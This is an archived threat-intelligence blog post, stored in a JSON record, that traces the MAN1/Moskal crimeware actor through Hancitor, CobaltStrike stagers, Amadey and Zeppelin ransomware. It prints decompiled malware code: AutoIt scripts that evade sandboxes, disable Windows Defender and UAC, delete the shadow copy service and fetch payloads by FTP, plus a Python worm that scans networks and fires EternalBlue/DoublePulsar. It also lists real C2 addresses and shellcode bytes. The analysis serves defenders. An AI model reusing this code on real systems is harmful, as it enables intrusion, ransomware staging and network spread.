{
	"id": "57df1386-8591-474b-b42b-b5b95b586d68",
	"created_at": "2026-04-06T00:14:56.989855Z",
	"updated_at": "2026-04-10T13:12:41.786754Z",
	"deleted_at": null,
	"sha1_hash": "147179dfe5390b66c89e93060c3c28ea1fac658b",
	"title": "MAN1, Moskal, Hancitor and a side of Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1057080,
	"plain_text": "MAN1, Moskal, Hancitor and a side of Ransomware\r\nBy Jason Reaves\r\nPublished: 2021-01-10 · Archived: 2026-04-05 13:09:36 UTC\r\nMAN1 AKA Moskalvzapoe AKA TA511 are all names given to a threat actor (TA) that has been active in most\r\nmajor crimeware activities since at least 2014.\r\nWithin the last few years most of the major e-crime groups have shifted away from normal banking trojan\r\noperations and moved towards ransom and data theft; this transition has proven to be very beneficial for them —\r\neven though it is a drastic shift from the older days where locking activities were considered to be low-tier\r\nactivities and a waste of an infection.\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 1 of 20\n\nRansomware payments from FBI, Photo Credit FBI Special Agent Joel DeCapua\r\nAs more groups began pivoting to enterprise-focused ransomware activities into 2020, it caused a trend where\r\ncompanies began funding these e-crime groups through ransom payments, turning them into criminal\r\norganizations with funding that rivals any major security startup. MAN1 is no exception, as many researchers\r\nstarted to notice that Hancitor/Chanitor campaigns began leading to CobaltStrike.\r\nIn the linked sandbox report from the SANS article we can download and decode the chanitor/hancitor task listed:\r\nhttp://yudiartawan.com/a\r\nThe file can be decoded by using the first 8 bytes as an XOR key and then LZNT decompressing the result.\r\nAfter decoding the file we are left with a packed CobaltStrike stager; these stagers are built from CobaltStrike\r\nmuch like the beacon files, as both will share the same watermark. 
After unpacking we can decode the shellcode\r\nthat will be responsible for downloading the beacon file:\r\n\\xfc\\xe8\\x89\\x00\\x00\\x00`\\x89\\xe51\\xd2d\\x8bR0\\x8bR\\x0c\\x8bR\\x14\\x8br(\\x0f\\xb7J\u00261\\xff1\\xc0\\xac\u003ca|\\x02\r\nThis stager shellcode will download and detonate the encoded beacon from:\r\n31.44.184.125/tYX7\r\nThe file is also available in the sandbox run, so we can decode the file, which has a shellcode wrapper on top,\r\nand then decode the CobaltStrike beacon configuration.\r\n{'PROXY_BEHAVIOR': '2', 'PROTOCOL': '0', 'SPAWNTO_X64': '%windir%\\\\sysnative\\\\rundll32.exe', 'SLEEPTI\r\nThe watermark from the beacon also matches the shellcode from the stager executable:\r\n'WATERMARK': '1873433027'\\xff31.44.184.125\\x00o\\xaaQ\\xc3\r\nWatermarks can be pivoted on by abusing the structure of the beacon configuration and known XOR keys; we\r\ntake the watermark value:\r\no\\xaaQ\\xc3\r\nXOR with 0x69:\r\n\\x06\\xc38\\xaa\r\nWe can find this value in the beacon:\r\n\u003e\u003e\u003e a = '\\x06\\xc38\\xaa'\r\n\u003e\u003e\u003e data = open('tYX7.decoded', 'rb').read()\r\n\u003e\u003e\u003e data.find(a)\r\n202686\r\n\u003e\u003e\u003e data[202650:202700]\r\n'ijiy9\u0026:=iiiiiiiiiiiiiuikimiiiiiLikim\\x06\\xc38\\xaaiOihikiiiN'\r\nThen do a VT content search based on part of the encoded data:\r\ncontent:\"{696b696d06c338aa}\"\r\nWhich leads to a bunch of files to pivot on.\r\nIf the CS package is shared or leaked, however, then it can lead you down all sorts of rabbit holes: you can use it\r\nto find lots of samples and then automate decoding all the config data and compare the beacon config and templating\r\nto try to find more related files.\r\nFor now I’m 
interested in a sample that talks to the IP and is packed with the same packer as the previous one:\r\nbd3c278309e4fe19f7b424ee0b56a1a2c0bbae3a59882d5b6f171d3ca89f728b\r\nUnpacking this file gives us similar shellcode:\r\n\\xfc\\xe8\\x89\\x00\\x00\\x00`\\x89\\xe51\\xd2d\\x8bR0\\x8bR\\x0c\\x8bR\\x14\\x8br(\\x0f\\xb7J\u00261\\xff1\\xc0\\xac\u003ca|\\x02\r\nSame watermark, IP address and URI as the previous one, but this file has an interesting ITW (In the Wild) record\r\nin VirusTotal:\r\nhttp://en.bulgarienview.com/wp-content/themes/twentynineteen/inc/artvnch.exe\r\nThe filename for artvnch.exe as a CS stager can be seen as a tasking for an Amadey bot in VirusTotal,\r\nf3823f8c3d1f3d45e1a9268df5b89f9f60fa02f8ad267e7e6b7cbff74dcaf627.\r\nThis Amadey is associated with MAN1, Version 1.43 and C2s:\r\ncompturot .com/f5lkB/index.php\r\nthaturicia .ru/f5lkB/index.php\r\ncholopethe .ru/f5lkB/index.php\r\nWe can actually find a lot of these files with the same names that are CS stagers being downloaded as tasks.\r\nbe4c49df859762dc2c7d11794f5731dd498698158b11a9ff18b3f91fdc1f591a\r\nCS stager downloaded from: hxxp://ph\r\nThe actor(s) appear to use multiple IP addresses along this range and a few others, for example:\r\n45.142.213.167\r\nWe can see a few things: the artvnch.exe name again, but also a work.exe file, which is a CS stager downloading a\r\nbeacon from:\r\n45.142.213.167/imP6\r\nThe watermark is also the same as our previously identified CS files. 
This server is hosting a number of other\r\ninteresting files:\r\nea93c89dbf63ec462f19f6ac039c0cdf3d283b64eaadd6c38679c9b70710bd71, doe_install.exe\r\n6e4459199d7fbdc4c215e595906e78fdd1c15ad3be6abed6540b80de17b63f3b,oxford.exe\r\nea93c89dbf63ec462f19f6ac039c0cdf3d283b64eaadd6c38679c9b70710bd71\r\nThe file doe_install.exe will, according to the cached sandbox report on VirusTotal, talk to another CS server:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 5 of 20\n\n185.153.196.207\r\nThis is an autoit compiled script that will eventually detonate two files but also perform some anti checks.\r\n$john = \"John\"\r\n$name1 = \"Peter Wilson\"\r\n$name2 = \"Acme\"\r\n$name3 = \"BOBSPC\"\r\n$name4 = \"Johnson\"\r\n$name5 = \"John\"\r\n$name6 = \"John Doe\"\r\n$name7 = \"Rivest\"\r\n$name8 = \"mw\"\r\n$name9 = \"me\"\r\n$name10 = \"sys\"\r\n$name11 = \"Apiary\"\r\n$name12 = \"STRAZNJICA.GRUBUTT\"\r\n$name13 = \"Phil\"\r\n$name14 = \"Customer\"\r\n$name15 = \"shimamu\"\r\n$pcname1 = \"RALPHS-PC\"\r\n$pcname2 = \"ABC-WIN7\"\r\n$pcname3 = \"man-PC\"\r\n$pcname4 = \"luser-PC\"\r\n$pcname5 = \"Klone-PC\"\r\n$pcname6 = \"tpt-PC\"\r\n$pcname7 = \"BOBSPC\"\r\n$pcname8 = \"WillCarter-PC\"\r\n$pcname9 = \"PETER-PC\"\r\n$pcname10 = \"David-PC\"\r\n$pcname11 = \"ART-PC\"\r\n$pcname12 = \"TOM-PC\"\r\nIf ProcessExists(\"frida-winjector-helper-32.exe\") OR ProcessExists(\"analyzer.exe\") Then\r\nExit\r\nEndIf\r\n$name = @UserName\r\n$pcname = @ComputerName\r\nIf @ComputerName = \"WIN7SP1-SSLCAP\" Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\secret.txt\") Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\my.txt\") Then\r\nExit\r\nEndIf\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 6 of 20\n\nIf FileExists(@DesktopDir \u0026 \"\\report.odt\") Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\report.rtf\") 
Then\r\nExit\r\nEndIf\r\nIf FileExists(@DesktopDir \u0026 \"\\Incidents.pptx\") Then\r\nExit\r\nEndIf\r\nIf $name = $name1 Then\r\nExit\r\nEndIf\r\nIf $name = $name2 Then\r\nExit\r\nEndIf\r\nIf $name = $name3 Then\r\nExit\r\nEndIf\r\nIf $name = $name4 Then\r\nExit\r\nEndIf\r\nIf $name = $name5 Then\r\nExit\r\nEndIf\r\nIf $name = $name6 Then\r\nExit\r\nEndIf\r\nIf $name = $name7 Then\r\nExit\r\nEndIf\r\nIf $name = $name8 Then\r\nExit\r\nEndIf\r\nIf $name = $name9 Then\r\nExit\r\nEndIf\r\nIf $name = $name10 Then\r\nExit\r\nEndIf\r\nIf $name = $name11 Then\r\nExit\r\nEndIf\r\nIf $name = $name12 Then\r\nExit\r\nEndIf\r\nIf $name = $name13 Then\r\nExit\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 7 of 20\n\nEndIf\r\nIf $name = $name14 Then\r\nExit\r\nEndIf\r\nIf $name = $name15 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname1 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname2 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname3 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname4 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname5 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname6 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname7 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname8 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname9 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname10 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname11 Then\r\nExit\r\nEndIf\r\nIf $pcname = $pcname12 Then\r\nExit\r\nEndIf\r\nIf ProcessExists(\"joeboxcontrol.exe\") OR ProcessExists(\"joeboxserver.exe\") Then\r\nExit\r\nEndIf\r\nIf @OSVersion = \"WIN_XP\" Then\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 8 of 20\n\nExit\r\nEndIf\r\nIf FileExists(\"C:\\ProgramData\\Microsoft\\Check\\Check.txt\") Then\r\nExit\r\nAttempts to disable or uninstall security software:\r\nIf ProcessExists(\"msseces.exe\") Then\r\n$scmd = 'C:\\Windows\\System32\\wbem\\wmic.exe product where name=\"Microsoft Security Client\" cal\r\n$ipid = 
Run(@ComSpec \u0026 ' /C \"' \u0026 $scmd \u0026 '\"', \"\", @SW_HIDE)\r\nSleep(8000)DirCreate(\"C:\\Programdata\\install\")\r\nDirCreate(\"C:\\Programdata\\RunDLL\")\r\nDirCreate(\"C:\\Programdata\\Microsoft\\Intel\")\r\nDirCreate(\"C:\\Programdata\\System32\\logs\")\r\nDirCreate(\"C:\\ProgramData\\Microsoft\\Check\")\r\nDirCreate(\"C:\\ProgramData\\RealtekHD\")\r\nDirCreate(\"C:\\programdata\\WindowsTask\")\r\nDirCreate(\"C:\\programdata\\Microsoft\\temp\")\r\n$logfile = \"C:\\Programdata\\Microsoft\\Check\\Check.txt\"\r\nIf NOT FileExists($logfile) Then _filecreate($logfile)\r\n$pathscript = \"C:\\ProgramData\\RealtekHD\\taskhostw.exe\"\r\n$sname = (\"Realtek HD Audio\")\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\", $sname, \"REG_SZ\", $pathscript\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserLi\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\", \"DisableAntiSpyware\r\nRegWrite(\"HKLM\\SOFTWARE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\", \"DisableAntiSpyware\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableIO\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableBe\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableOn\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", 
\"Disable\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\", \"DisableRa\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"DisableBlockAltFirstS\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"DisableBlockAltFirstSee\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"LocalSettingOverrideS\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"LocalSettingOverrideSpy\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 9 of 20\n\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"SumbitSamplesConsent\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet\", \"SumbitSamplesConsent\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\", \"Exclusions_Paths\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\", \"Exclusions_Paths\",\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Programd\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Programdat\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Windows\\\r\nRegWrite(\"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths\", \"C:\\Windows\\Sy\r\nSleep(50)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"EnableLUA\", \"RE\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"EnableLUA\", \"REG_\r\nSleep(100)\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", 
\"ConsentPromptBeha\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\", \"ConsentPromptBe\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\", \"UseActionCenterE\r\nRegWrite(\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\", \"UseActionCenterExp\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\", \"En\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\", \"disable\",\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\", \"To\r\nSleep(100)\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting\", \"DisableEnhancedNot\r\nRegWrite(\"HKLM64\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\UX Configuration\", \"Notificatio\r\nSleep(100)\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\", 
\"Di\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nRegWrite(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Disal\r\nDelete shadow file service:\r\nRun(@ComSpec \u0026 \" /c \" \u0026 \"sc delete swprv\", \"\", @SW_HIDE)\r\nThe script will also perform a request at the end which is probably for stats tracking:\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 10 of 20\n\n$iplog2 = \"https://iplogger.org/1fCk97\"\r\nInetRead($iplog2, 3)\r\nUltimately as mentioned before the script will detonate two files:\r\nIf @OSArch = \"X64\" Then\r\nFileInstall(\"C:\\2\\taskhostw.exe\", \"C:\\ProgramData\\RealtekHD\\taskhostw.exe\")\r\nSleep(1000)\r\nRun(\"C:\\ProgramData\\RealtekHD\\taskhostw.exe\")\r\nFileInstall(\"C:\\2\\art.exe\", \"C:\\ProgramData\\install\\art.exe\")\r\nRun(\"C:\\ProgramData\\install\\art.exe\")\r\nart.exe — 
d08131d236658401c8de489596ee83992058f05176cbd8b72add89fcea57e37c\r\nThis is a packed CS stager that will download a beacon from:\r\n185.153.196. 207/M7ph\r\nAlso with the same watermark as our previously identified CS related files. The other file is a bit different.\r\ntaskhostw.exe — 3ac1741ee7dcf04cb5dba01d82d4232347a63697f0ca8b00661960f719cade23\r\nThis is a 64-bit AutoIt compiled executable; decompiling shows the file is simply a loader. It has the same anti\r\nchecks as previously discussed but also creates a window with the title “YouWillBeMined2” which will be used as\r\na check to see if it is already running.\r\nGUICreate(\"YouWillBeMined2\")\r\nThe script will then download a file from an FTP server:\r\n$worked = \"ONLINE\"\r\n$server = \"learinmica.com\"\r\n$username = \"alex\"\r\n$pass = \"easypassword\"\r\nLocal $open = _ftp_open(\"FTP\")\r\nJudging by the checks that then happen you can speculate that this will be involved in SMB scanning for\r\nspreading:\r\nIf $worked = \"ONLINE\" Then\r\nIf $ftp_status = \"ONLINE\" Then\r\nIf @OSVersion \u003c\u003e \"WIN_10\" Then\r\nIf NOT FileExists(\"C:\\Programdata\\RunDLL\\Doublepulsar-1.3.1.exe\") OR NOT File\r\nConsoleWrite(\"Downlading Scaner.dat\" \u0026 @CRLF)\r\nLocal $ftp_xmrigcpu64 = \"scaner.dat\"\r\nLocal $hopen = _ftp_open(\"FTP\")\r\nLocal $hconn = _ftp_connect($hopen, $server, $username, $pass, 1)\r\nLocal $ftpg = _ftp_fileget($hconn, $ftp_xmrigcpu64, \"C:\\Programdata\\W\r\nLocal $isize = _ftp_filegetsize($hconn, \"/\" \u0026 $ftp_xmrigcpu64)\r\nConsoleWrite($isize \u0026 @CRLF)\r\nLocal $iftpc = _ftp_close($hconn)\r\nLocal $iftpo = _ftp_close($hopen)\r\nFileSetAttrib(\"C:\\ProgramData\\WindowsTask\\scaner.dat\", 
\"+SH\")\r\nSleep(300)\r\nFileMove(\"C:\\Programdata\\Windowstask\\scaner.dat\", \"C:\\Programdata\\Win\r\nFileSetAttrib(\"C:\\ProgramData\\WindowsTask\\scaner.exe\", \"+SH\")\r\nSleep(300)\r\nRun(\"C:\\Programdata\\WindowsTask\\scaner.exe -pnaxui\")\r\nSleep(2000)\r\nFileDelete(\"C:\\Programdata\\WindowsTask\\scaner.dat\")\r\nFileDelete(\"C:\\Programdata\\WindowsTask\\scaner.exe\")\r\nFileSetAttrib(\"C:\\ProgramData\\RunDLL\\*.*\", \"+SH\")\r\nFileSetAttrib(\"C:\\ProgramData\\RunDLL\", \"+SH\")\r\nEndIf\r\nSleep(2000)\r\nIf NOT ProcessExists(\"system.exe\") Then\r\nIf NOT ProcessExists(\"Msiexec64.exe\") Then\r\nIf FileExists(\"C:\\ProgramData\\RunDLL\\start.exe\") Then\r\nRun(\"C:\\ProgramData\\RunDLL\\start.exe\")\r\nConsoleWrite(\"Staring Scaner RunDLL.exe\" \u0026 @CRLF)\r\nEndIf\r\nEndIf\r\nEndIf\r\nEndIf\r\nFTP server is on same range as some of the CS boxes:\r\nlearinmica .com. 600 IN A 31.44.184 .108\r\nscaner.dat — 3f51abd78e607bcd707cbd2f4d90a3d02d5d00fa07320a88838c373239ee6d4b\r\nThis file is a password protected self extracting rar, the password is naxui from the detonation above in the script.\r\nAfter unpacking the files we are left with a bunch of files related to EternalBlue and DoublePulsar but the script\r\nabove is mainly related to detonating start.exe\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 12 of 20\n\nstart.exe — 54081e33bcd09d29d065533c230256e49adff2edd48f5eb91a2434c03dd9ecb9\r\nThis file is a SFX RAR with a vbs inside of it, the VBS file just detonates another file that was unpacked:\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run \"cmd.exe /c Rundll.exe\", 0, false\r\nrundll.exe — 8b58e3a1a6a11225050af6c82e92451779c0315a602d19ad330e175a7c416bf6\r\nThis is a compiled python script which we can decompile:\r\nimport subprocess\r\nimport time\r\nimport threading\r\nimport socket\r\nimport sys\r\nimport random\r\nimport os\r\ntry:\r\n MyIP = 
socket.gethostbyname_ex(socket.gethostname())[2]\r\nexcept:\r\n MyIP = '10.0.0.2'\r\ndef EternalBlue(ip):\r\n path = 'Eternalblue-2.2.0.exe'\r\n inconfig = ' --inconfig Eternalblue-2.2.0.xml'\r\n NetworkTimeout = ' --NetworkTimeout 60'\r\n TargetIp = ' --TargetIp %s' % ip\r\n TargetPort = ' --TargetPort 445'\r\n Target = ' --Target WIN72K8R2'\r\n summ = path + inconfig + NetworkTimeout + TargetIp + TargetPort + Target\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(summ, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n output = list(output)\r\n output = output[0].split('\\r\\n')\r\n if output.count('[+] CORE terminated with status code 0x00000000') == 1 and output.count(' [+\r\n x = 'good x64'\r\n return x\r\n elif output.count('[+] CORE terminated with status code 0x00000000') == 1 and output.count('\r\n x = 'good x86'\r\n return x\r\n else:\r\n x = 'not good'\r\n return x\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 13 of 20\n\ndef Pulsar(ip, arch, dll):\r\n path = 'Doublepulsar-1.3.1.exe'\r\n inconfig = ' --inconfig Doublepulsar-1.3.1.xml'\r\n NetworkTimeout = ' --NetworkTimeout 60'\r\n TargetIp = ' --TargetIp %s' % ip\r\n TargetPort = ' --TargetPort 445'\r\n DllPayload = ' --DllPayload %s' % dll\r\n DllOrdinal = ' --DllOrdinal 1'\r\n ProcessName = ' --ProcessName lsass.exe'\r\n Protocol = ' --Protocol SMB'\r\n Architecture = ' --Architecture %s' % arch\r\n Function = ' --Fuction RunDll'\r\n processCommandLine = ' --processCommandLine'\r\n summ = path + inconfig + NetworkTimeout + TargetIp + TargetPort + Architecture + DllPayload + Pro\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(summ, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n list(output)\r\n output = output[0].split('\\r\\n')\r\ndef scaner(ip):\r\n try:\r\n os.remove('Result.txt')\r\n except:\r\n pass\r\n Result = []\r\n scan = 'system.exe 
TCP %s 445 150 /save' % ip\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(scan, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\n output = p.communicate()\r\n for line in open('Result.txt', 'r').read().split('\\n'):\r\n if line.find('Open') \u003e 1:\r\n Result.append(line.split(' ')[0])\r\n print Result\r\n os.remove('Result.txt')\r\n return Result\r\ndef scaner_local(ip):\r\n try:\r\n os.remove('Result.txt')\r\n except:\r\n pass\r\n Result = []\r\n scan = 'system.exe TCP %s 445 150 /save' % ip\r\n PIPE = subprocess.PIPE\r\n p = subprocess.Popen(scan, shell=True, stdin=PIPE, stdout=PIPE, stderr=subprocess.STDOUT)\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 14 of 20\n\noutput = p.communicate()\r\n for line in open('Result.txt', 'r').read().split('\\n'):\r\n if line.find('Open') \u003e 1:\r\n Result.append(line.split(' ')[0])\r\n for x in MyIP:\r\n if x in Result:\r\n Result.remove(x)\r\n os.remove('Result.txt')\r\n return Result\r\ndef attack(lst):\r\n status = EternalBlue(lst)\r\n if status == 'good x64':\r\n Pulsar(lst, 'x64', 'x64.dll')\r\n print 'Attack %s good' % lst\r\n elif status == 'good x86':\r\n Pulsar(lst, 'x86', 'x86.dll')\r\n print 'Attack %s good' % lst\r\n else:\r\n print 'Attack %s not good!!!' % lst\r\ndef attack2(lst):\r\n status = EternalBlue(lst)\r\n if status == 'good x64':\r\n Pulsar(lst, 'x64', '2x64.dll')\r\n print 'Attack %s good' % lst\r\n elif status == 'good x86':\r\n Pulsar(lst, 'x86', '2x86.dll')\r\n print 'Attack %s good' % lst\r\n else:\r\n print 'Attack %s not good!!!' 
% lst\r\ndef new_start():\r\n print 'STARTED'\r\n scanlist = []\r\n lst = []\r\n for line in open('scan.txt', 'r').read().split('\\n'):\r\n for unit in line.split(' '):\r\n scanlist.append(unit)\r\n randomip = random.choice(scanlist)\r\n lst = scaner(randomip)\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack2, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 15 of 20\n\nprint 'FINISHED'\r\ndef start_local():\r\n print 'STARTED_local'\r\n lst = []\r\n for ip in MyIP:\r\n lst = scaner_local(ip + '/16')\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\n print 'FINISHED'\r\ndef new_random():\r\n print 'STARTED'\r\n randomip = str(random.randint(1, 254)) + '.' + str(random.randint(0, 254)) + '.' + '0.' + '0'\r\n print 'scan ' + randomip + '/16'\r\n lst = scaner(randomip + '/16')\r\n for y in lst:\r\n thread_ = threading.Thread(target=attack, args=(y,)).start()\r\n while threading.active_count() \u003e 2:\r\n time.sleep(5)\r\n print 'FINISHED'\r\nwhile True:\r\n new_start()\r\n start_local()\r\nUltimately this script is using DoublePulsar and EternalBlue to spread the x86.dll,x64.dll,2x86.dll,2x64.dll files\r\nwhich turn out to be fairly simplistic downloaders:\r\nUser-Agent RookIE/1.0\r\nhxxp://learinmica.com/update/update[.]rar\r\nThe file will be stored in the ProgramData directory and leads to similar Autoit executables for using scaner.dat\r\nand CS stagers leading to more CS servers:\r\ntaskhosta.exe - e2f686f17b73398d949998e46c7fde48d0507b324a811df39cdd91531deb3d89\r\nThis is a CS stager using a different watermark and downloading a beacon from:\r\n31.44.184 .50/nECf\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 16 of 20\n\nThe other file we previously 
mentioned from 45.142.213[.]167:\r\noxford.exe - 6e4459199d7fbdc4c215e595906e78fdd1c15ad3be6abed6540b80de17b63f3b\r\nThis is VegaLocker ransomware version Zeppelin, we can quickly decode all the onboard strings:\r\n\u003e\u003e\u003e import re\r\n\u003e\u003e\u003e t = re.findall('''\\xff\\xff\\xff\\xff.\\x00\\x00\\x00''', data)\r\n\u003e\u003e\u003e len(t)\r\n268\r\n\u003e\u003e\u003e def decode(blah):\r\n... rc4 = ARC4.new(blah[:0x20])\r\n... return rc4.decrypt(blah[0x20:])\r\n...\r\n\u003e\u003e\u003e import struct\r\n\u003e\u003e\u003e for val in t:\r\n... o = data.find(val)\r\n... (a,b) = struct.unpack_from('\u003cII', data[o:])\r\n... blob = data[o+8:o+8+b]\r\n... try:\r\n... print(decode(blob))\r\n... except:\r\n... pass\r\n...\r\nA snippet of the decoded 